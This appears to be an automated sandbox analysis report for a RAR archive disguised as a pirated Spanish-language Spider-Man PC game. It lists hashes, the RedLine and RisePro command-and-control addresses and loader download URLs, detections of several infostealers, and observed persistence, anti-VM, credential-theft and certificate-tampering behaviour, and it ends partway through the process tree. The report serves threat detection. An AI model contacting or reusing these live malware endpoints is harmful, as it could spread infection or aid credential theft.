Analysis
-
max time kernel
183s -
max time network
237s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-es -
resource tags
arch:x64arch:x86image:win10v2004-20240508-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
13-05-2024 19:15
Static task
static1
Behavioral task
behavioral1
Sample
Marvels_Spider-Man_Remastered_PC_Full_Español_2022.rar
Resource
win10v2004-20240508-es
General
-
Target
Marvels_Spider-Man_Remastered_PC_Full_Español_2022.rar
-
Size
3.1MB
-
MD5
89b88d91b0aca55a3349d61b9ca8b2ae
-
SHA1
7164c6b87118064c7ce0fae36cf62c495d31114b
-
SHA256
22aebbc3e521b597103513af842c541c66ada5e0060a07878440abf89e708b46
-
SHA512
1b7053b94cf96d2a44a58988312497db0c85f70a9310c8f9baff1636e522da1721bb1a548c4ff681b2de565556f8090183b1a2e2eac45353111ad689b53f8917
-
SSDEEP
98304:JOIoOqeD9VmAU77Xy1RMaMSV6Vd5G3Olsx:JOAqkk1HgMSVyG+u
Malware Config
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.77:6541
Extracted
risepro
147.45.47.126:58709
Signatures
-
Detect Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0007000000023468-108.dat family_vidar_v7 -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral1/files/0x0007000000023470-163.dat family_zgrat_v1 behavioral1/memory/1108-223-0x0000000000FD0000-0x000000000134E000-memory.dmp family_zgrat_v1 behavioral1/memory/1072-462-0x0000000000400000-0x000000000046C000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
setup.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" setup.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3832-234-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
setup.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid Process 199 3676 powershell.exe 204 2916 powershell.exe 206 2916 powershell.exe 226 3700 powershell.exe 228 3700 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3596 powershell.exe 5084 powershell.exe 6128 powershell.exe 2916 powershell.exe 3700 powershell.exe 3676 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/files/0x0007000000023470-163.dat net_reactor behavioral1/memory/1108-223-0x0000000000FD0000-0x000000000134E000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exesetup.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exesetup.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation setup.exe -
Drops startup file 1 IoCs
Processes:
lKSqTJcm_Cf5uoLE_rJlMm9X.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk lKSqTJcm_Cf5uoLE_rJlMm9X.exe -
Executes dropped EXE 24 IoCs
Processes:
setup.exeuBzB21gRaBCu4H8yUqct1nh5.exelKSqTJcm_Cf5uoLE_rJlMm9X.exeY_7lx3qbW8Cc5FJCkgxhON9a.exerWY00BTVMcYAYs88zigHdVER.exeAyxJNOQHL9N1vrYlI26EL0vt.exeM9t70m9l2GWmJQ9HGwtq1O7B.exe_b66BKpWGl_AANYbhK6JGC5u.exeCqWTZWLU9Ugh8d16tHa8dRGv.exeakyR2rcV7zbcm3y7o4EZuROd.exeP_qunqSD2lV8ZrnT2ae1YWI6.exeCbg2h2gIETpIIX8v76vjfnoi.exeBUaQi4cP1zyljDx396pYQARx.exeGvj0dmnTTvIZM6cWpErE13Av.exeGvj0dmnTTvIZM6cWpErE13Av.tmpInstall.exeInstall.exevoicemod32.exevoicemod32.exei0.exei0.tmpbkqtzupkspiy.exeInstall.exeopenssl.exepid Process 1644 setup.exe 1108 uBzB21gRaBCu4H8yUqct1nh5.exe 1580 lKSqTJcm_Cf5uoLE_rJlMm9X.exe 3600 Y_7lx3qbW8Cc5FJCkgxhON9a.exe 3660 rWY00BTVMcYAYs88zigHdVER.exe 3248 AyxJNOQHL9N1vrYlI26EL0vt.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 2840 _b66BKpWGl_AANYbhK6JGC5u.exe 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 4984 akyR2rcV7zbcm3y7o4EZuROd.exe 3112 P_qunqSD2lV8ZrnT2ae1YWI6.exe 3320 Cbg2h2gIETpIIX8v76vjfnoi.exe 4384 BUaQi4cP1zyljDx396pYQARx.exe 3648 Gvj0dmnTTvIZM6cWpErE13Av.exe 628 Gvj0dmnTTvIZM6cWpErE13Av.tmp 928 Install.exe 3052 Install.exe 4816 voicemod32.exe 4600 voicemod32.exe 4100 i0.exe 4920 i0.tmp 3616 bkqtzupkspiy.exe 164 Install.exe 2796 openssl.exe -
Loads dropped DLL 7 IoCs
Processes:
Cbg2h2gIETpIIX8v76vjfnoi.exeGvj0dmnTTvIZM6cWpErE13Av.tmpuBzB21gRaBCu4H8yUqct1nh5.exeopenssl.exepid Process 3320 Cbg2h2gIETpIIX8v76vjfnoi.exe 628 Gvj0dmnTTvIZM6cWpErE13Av.tmp 628 Gvj0dmnTTvIZM6cWpErE13Av.tmp 628 Gvj0dmnTTvIZM6cWpErE13Av.tmp 1108 uBzB21gRaBCu4H8yUqct1nh5.exe 2796 openssl.exe 2796 openssl.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1644-6-0x0000000140000000-0x0000000140A55000-memory.dmp themida behavioral1/memory/1644-14-0x0000000140000000-0x0000000140A55000-memory.dmp themida behavioral1/memory/1644-134-0x0000000140000000-0x0000000140A55000-memory.dmp themida behavioral1/memory/1644-143-0x0000000140000000-0x0000000140A55000-memory.dmp themida behavioral1/memory/1644-168-0x0000000140000000-0x0000000140A55000-memory.dmp themida behavioral1/memory/1644-364-0x0000000140000000-0x0000000140A55000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
BUaQi4cP1zyljDx396pYQARx.exelKSqTJcm_Cf5uoLE_rJlMm9X.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" BUaQi4cP1zyljDx396pYQARx.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" lKSqTJcm_Cf5uoLE_rJlMm9X.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
setup.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 233 ipinfo.io 234 ipinfo.io 236 checkip.amazonaws.com 238 checkip.amazonaws.com 44 api.myip.com 45 api.myip.com 48 ipinfo.io 49 ipinfo.io -
Drops file in System32 directory 4 IoCs
Processes:
setup.exedescription ioc Process File opened for modification C:\Windows\System32\GroupPolicy setup.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
setup.exeBUaQi4cP1zyljDx396pYQARx.exepid Process 1644 setup.exe 4384 BUaQi4cP1zyljDx396pYQARx.exe 4384 BUaQi4cP1zyljDx396pYQARx.exe 4384 BUaQi4cP1zyljDx396pYQARx.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
CqWTZWLU9Ugh8d16tHa8dRGv.exeuBzB21gRaBCu4H8yUqct1nh5.exebkqtzupkspiy.exedescription pid Process procid_target PID 4368 set thread context of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 1108 set thread context of 1072 1108 uBzB21gRaBCu4H8yUqct1nh5.exe 157 PID 3616 set thread context of 5224 3616 bkqtzupkspiy.exe 203 PID 3616 set thread context of 5292 3616 bkqtzupkspiy.exe 207 -
Drops file in Program Files directory 8 IoCs
Processes:
chrome.exechrome.exei0.tmpdescription ioc Process File created C:\Program Files\scoped_dir5560_1586316086\extension.zip chrome.exe File created C:\Program Files\scoped_dir4452_1343954390\extension.zip chrome.exe File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml i0.tmp -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc Process File created C:\Windows\Tasks\butYHpXTvMdZIJsEKZ.job schtasks.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 2156 sc.exe 2752 sc.exe 2092 sc.exe 2052 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 5808 5348 WerFault.exe 248 -
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
P_qunqSD2lV8ZrnT2ae1YWI6.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString P_qunqSD2lV8ZrnT2ae1YWI6.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 2796 schtasks.exe 5724 schtasks.exe 5076 schtasks.exe 4828 schtasks.exe 3744 schtasks.exe 1652 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid Process 1880 taskkill.exe 5132 taskkill.exe -
Modifies data under HKEY_USERS 8 IoCs
Processes:
Install.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936cb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Install.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936cb0000006024b221ea3a6910a2dc08002b30309d97010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Install.exe -
Modifies registry class 2 IoCs
Processes:
cmd.exeOpenWith.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings OpenWith.exe -
Processes:
RegAsm.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 212 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 240 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 55 IoCs
Processes:
lKSqTJcm_Cf5uoLE_rJlMm9X.exeM9t70m9l2GWmJQ9HGwtq1O7B.exerWY00BTVMcYAYs88zigHdVER.exe_b66BKpWGl_AANYbhK6JGC5u.exepowershell.exepowershell.exepowershell.exeP_qunqSD2lV8ZrnT2ae1YWI6.exepowershell.exepowershell.exeRegAsm.exeMsBuild.exebkqtzupkspiy.exepid Process 1580 lKSqTJcm_Cf5uoLE_rJlMm9X.exe 1580 lKSqTJcm_Cf5uoLE_rJlMm9X.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 3660 rWY00BTVMcYAYs88zigHdVER.exe 3660 rWY00BTVMcYAYs88zigHdVER.exe 3660 rWY00BTVMcYAYs88zigHdVER.exe 3660 rWY00BTVMcYAYs88zigHdVER.exe 2840 _b66BKpWGl_AANYbhK6JGC5u.exe 2840 _b66BKpWGl_AANYbhK6JGC5u.exe 3596 powershell.exe 3596 powershell.exe 3596 powershell.exe 3676 powershell.exe 3676 powershell.exe 3676 powershell.exe 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 3112 P_qunqSD2lV8ZrnT2ae1YWI6.exe 3112 P_qunqSD2lV8ZrnT2ae1YWI6.exe 5084 powershell.exe 5084 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 5084 powershell.exe 3832 RegAsm.exe 3832 RegAsm.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 3832 RegAsm.exe 3832 RegAsm.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 1388 M9t70m9l2GWmJQ9HGwtq1O7B.exe 1072 MsBuild.exe 1072 MsBuild.exe 1072 MsBuild.exe 1072 MsBuild.exe 1072 MsBuild.exe 1072 MsBuild.exe 3616 bkqtzupkspiy.exe 3616 bkqtzupkspiy.exe 3616 bkqtzupkspiy.exe 3616 bkqtzupkspiy.exe 3616 bkqtzupkspiy.exe 3616 bkqtzupkspiy.exe 3616 bkqtzupkspiy.exe 3616 bkqtzupkspiy.exe 3832 RegAsm.exe 3832 RegAsm.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
OpenWith.exepid Process 2912 OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zG.exepowershell.exepowershell.exepowershell.exeMsBuild.exepowershell.exepowershell.exeWMIC.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid Process Token: SeRestorePrivilege 1808 7zG.exe Token: 35 1808 7zG.exe Token: SeSecurityPrivilege 1808 7zG.exe Token: SeSecurityPrivilege 1808 7zG.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 1072 MsBuild.exe Token: SeBackupPrivilege 1072 MsBuild.exe Token: SeSecurityPrivilege 1072 MsBuild.exe Token: SeSecurityPrivilege 1072 MsBuild.exe Token: SeSecurityPrivilege 1072 MsBuild.exe Token: SeSecurityPrivilege 1072 MsBuild.exe Token: SeDebugPrivilege 5084 powershell.exe Token: SeDebugPrivilege 3700 powershell.exe Token: SeIncreaseQuotaPrivilege 3196 WMIC.exe Token: SeSecurityPrivilege 3196 WMIC.exe Token: SeTakeOwnershipPrivilege 3196 WMIC.exe Token: SeLoadDriverPrivilege 3196 WMIC.exe Token: SeSystemProfilePrivilege 3196 WMIC.exe Token: SeSystemtimePrivilege 3196 WMIC.exe Token: SeProfSingleProcessPrivilege 3196 WMIC.exe Token: SeIncBasePriorityPrivilege 3196 WMIC.exe Token: SeCreatePagefilePrivilege 3196 WMIC.exe Token: SeBackupPrivilege 3196 WMIC.exe Token: SeRestorePrivilege 3196 WMIC.exe Token: SeShutdownPrivilege 3196 WMIC.exe Token: SeDebugPrivilege 3196 WMIC.exe Token: SeSystemEnvironmentPrivilege 3196 WMIC.exe Token: SeRemoteShutdownPrivilege 3196 WMIC.exe Token: SeUndockPrivilege 3196 WMIC.exe Token: SeManageVolumePrivilege 3196 WMIC.exe Token: 33 3196 WMIC.exe Token: 34 3196 WMIC.exe Token: 35 3196 WMIC.exe Token: 36 3196 WMIC.exe Token: SeShutdownPrivilege 3396 powercfg.exe Token: SeCreatePagefilePrivilege 3396 powercfg.exe Token: SeShutdownPrivilege 1776 powercfg.exe Token: SeCreatePagefilePrivilege 1776 powercfg.exe Token: SeShutdownPrivilege 4816 powercfg.exe Token: SeCreatePagefilePrivilege 4816 powercfg.exe Token: SeShutdownPrivilege 2744 powercfg.exe Token: SeCreatePagefilePrivilege 2744 powercfg.exe Token: SeIncreaseQuotaPrivilege 3196 WMIC.exe Token: SeSecurityPrivilege 3196 WMIC.exe Token: SeTakeOwnershipPrivilege 3196 WMIC.exe Token: SeLoadDriverPrivilege 3196 WMIC.exe Token: SeSystemProfilePrivilege 3196 WMIC.exe Token: SeSystemtimePrivilege 3196 WMIC.exe Token: SeProfSingleProcessPrivilege 3196 WMIC.exe Token: SeIncBasePriorityPrivilege 3196 WMIC.exe Token: SeCreatePagefilePrivilege 3196 WMIC.exe Token: SeBackupPrivilege 3196 WMIC.exe Token: SeRestorePrivilege 3196 WMIC.exe Token: SeShutdownPrivilege 3196 WMIC.exe Token: SeDebugPrivilege 3196 WMIC.exe Token: SeSystemEnvironmentPrivilege 3196 WMIC.exe Token: SeRemoteShutdownPrivilege 3196 WMIC.exe Token: SeUndockPrivilege 3196 WMIC.exe Token: SeManageVolumePrivilege 3196 WMIC.exe Token: 33 3196 WMIC.exe Token: 34 3196 WMIC.exe Token: 35 3196 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
7zG.exepid Process 1808 7zG.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
OpenWith.exeBUaQi4cP1zyljDx396pYQARx.exepid Process 2912 OpenWith.exe 2912 OpenWith.exe 2912 OpenWith.exe 2912 OpenWith.exe 2912 OpenWith.exe 2912 OpenWith.exe 2912 OpenWith.exe 4384 BUaQi4cP1zyljDx396pYQARx.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup.exeGvj0dmnTTvIZM6cWpErE13Av.exeCqWTZWLU9Ugh8d16tHa8dRGv.exeakyR2rcV7zbcm3y7o4EZuROd.exeBUaQi4cP1zyljDx396pYQARx.exeInstall.exeGvj0dmnTTvIZM6cWpErE13Av.tmplKSqTJcm_Cf5uoLE_rJlMm9X.exedescription pid Process procid_target PID 1644 wrote to memory of 1108 1644 setup.exe 105 PID 1644 wrote to memory of 1108 1644 setup.exe 105 PID 1644 wrote to memory of 1108 1644 setup.exe 105 PID 1644 wrote to memory of 1580 1644 setup.exe 106 PID 1644 wrote to memory of 1580 1644 setup.exe 106 PID 1644 wrote to memory of 1580 1644 setup.exe 106 PID 1644 wrote to memory of 3648 1644 setup.exe 107 PID 1644 wrote to memory of 3648 1644 setup.exe 107 PID 1644 wrote to memory of 3648 1644 setup.exe 107 PID 1644 wrote to memory of 3600 1644 setup.exe 109 PID 1644 wrote to memory of 3600 1644 setup.exe 109 PID 1644 wrote to memory of 3600 1644 setup.exe 109 PID 1644 wrote to memory of 3660 1644 setup.exe 108 PID 1644 wrote to memory of 3660 1644 setup.exe 108 PID 1644 wrote to memory of 3660 1644 setup.exe 108 PID 1644 wrote to memory of 3248 1644 setup.exe 110 PID 1644 wrote to memory of 3248 1644 setup.exe 110 PID 1644 wrote to memory of 3248 1644 setup.exe 110 PID 1644 wrote to memory of 1388 1644 setup.exe 117 PID 1644 wrote to memory of 1388 1644 setup.exe 117 PID 1644 wrote to memory of 2840 1644 setup.exe 116 PID 1644 wrote to memory of 2840 1644 setup.exe 116 PID 1644 wrote to memory of 2840 1644 setup.exe 116 PID 1644 wrote to memory of 4368 1644 setup.exe 114 PID 1644 wrote to memory of 4368 1644 setup.exe 114 PID 1644 wrote to memory of 4368 1644 setup.exe 114 PID 1644 wrote to memory of 4984 1644 setup.exe 112 PID 1644 wrote to memory of 4984 1644 setup.exe 112 PID 1644 wrote to memory of 4984 1644 setup.exe 112 PID 1644 wrote to memory of 3112 1644 setup.exe 115 PID 1644 wrote to memory of 3112 1644 setup.exe 115 PID 1644 wrote to memory of 3112 1644 setup.exe 115 PID 1644 wrote to memory of 3320 1644 setup.exe 111 PID 1644 wrote to memory of 3320 1644 setup.exe 111 PID 1644 wrote to memory of 3320 1644 setup.exe 111 PID 1644 wrote to memory of 4384 1644 setup.exe 113 PID 1644 wrote to memory of 4384 1644 setup.exe 113 PID 1644 wrote to memory of 4384 1644 setup.exe 113 PID 3648 wrote to memory of 628 3648 Gvj0dmnTTvIZM6cWpErE13Av.exe 118 PID 3648 wrote to memory of 628 3648 Gvj0dmnTTvIZM6cWpErE13Av.exe 118 PID 3648 wrote to memory of 628 3648 Gvj0dmnTTvIZM6cWpErE13Av.exe 118 PID 4368 wrote to memory of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 4368 wrote to memory of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 4368 wrote to memory of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 4368 wrote to memory of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 4368 wrote to memory of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 4368 wrote to memory of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 4368 wrote to memory of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 4368 wrote to memory of 3832 4368 CqWTZWLU9Ugh8d16tHa8dRGv.exe 119 PID 4984 wrote to memory of 928 4984 akyR2rcV7zbcm3y7o4EZuROd.exe 120 PID 4984 wrote to memory of 928 4984 akyR2rcV7zbcm3y7o4EZuROd.exe 120 PID 4984 wrote to memory of 928 4984 akyR2rcV7zbcm3y7o4EZuROd.exe 120 PID 4384 wrote to memory of 5076 4384 BUaQi4cP1zyljDx396pYQARx.exe 121 PID 4384 wrote to memory of 5076 4384 BUaQi4cP1zyljDx396pYQARx.exe 121 PID 4384 wrote to memory of 5076 4384 BUaQi4cP1zyljDx396pYQARx.exe 121 PID 928 wrote to memory of 3052 928 Install.exe 123 PID 928 wrote to memory of 3052 928 Install.exe 123 PID 928 wrote to memory of 3052 928 Install.exe 123 PID 628 wrote to memory of 4816 628 Gvj0dmnTTvIZM6cWpErE13Av.tmp 169 PID 628 wrote to memory of 4816 628 Gvj0dmnTTvIZM6cWpErE13Av.tmp 169 PID 628 wrote to memory of 4816 628 Gvj0dmnTTvIZM6cWpErE13Av.tmp 169 PID 1580 wrote to memory of 1652 1580 lKSqTJcm_Cf5uoLE_rJlMm9X.exe 125 PID 1580 wrote to memory of 1652 1580 lKSqTJcm_Cf5uoLE_rJlMm9X.exe 125 PID 1580 wrote to memory of 1652 1580 lKSqTJcm_Cf5uoLE_rJlMm9X.exe 125
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Marvels_Spider-Man_Remastered_PC_Full_Español_2022.rar1⤵
- Modifies registry class
PID:4048
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2912
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Marvels_Spider-Man_Remastered_PC_Full_Español_2022\" -ad -an -ai#7zMap2868:158:7zEvent23251⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1808
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4112
-
